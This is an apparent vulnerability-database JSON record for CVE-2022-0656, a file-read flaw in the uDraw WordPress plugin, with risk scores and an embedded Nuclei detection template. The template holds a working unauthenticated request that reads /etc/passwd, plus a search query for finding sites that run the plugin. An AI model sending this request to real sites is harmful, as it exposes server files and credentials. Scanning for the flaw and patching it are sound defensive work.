{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-0656/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-0656/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-0656/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-0656/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-0656/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-0656"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-0656"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.07879,
      "kev": false,
      "percentile": 0.94452
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-0656.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2022-0656\n\ninfo:\n  name: uDraw <3.3.3 - Local File Inclusion\n  author: akincibor\n  severity: high\n  description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).\n  impact: |\n    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n  remediation: |\n    Upgrade uDraw to version 3.3.3 or later to mitigate the vulnerability.\n  reference:\n    - https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-0656\n    - https://github.com/ARPSyndicate/cvemon\n    - https://github.com/ARPSyndicate/kenzer-templates\n    - https://github.com/cyllective/CVEs\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2022-0656\n    cwe-id: CWE-552\n    epss-score: 0.07879\n    epss-percentile: 0.94452\n    cpe: cpe:2.3:a:webtoprint:web_to_print_shop\\:udraw:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: webtoprint\n    product: web_to_print_shop\\\n    google-query: inurl:\"/wp-content/plugins/udraw\"\n  tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n        X-Requested-With: XMLHttpRequest\n\n        action=udraw_convert_url_to_base64&url=/etc/passwd\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"cm9vd\" # root in base64\n          - \"data:image\\\\/;base64\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402207cb727a09675c5b244da12bc33553a269cf6f595d6822d1eb6579e0037b3a4a9022066025218c5bb19664deb58f45404b2287abd10ecf7a955cff19b92030b5ab6f6:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-0656"
}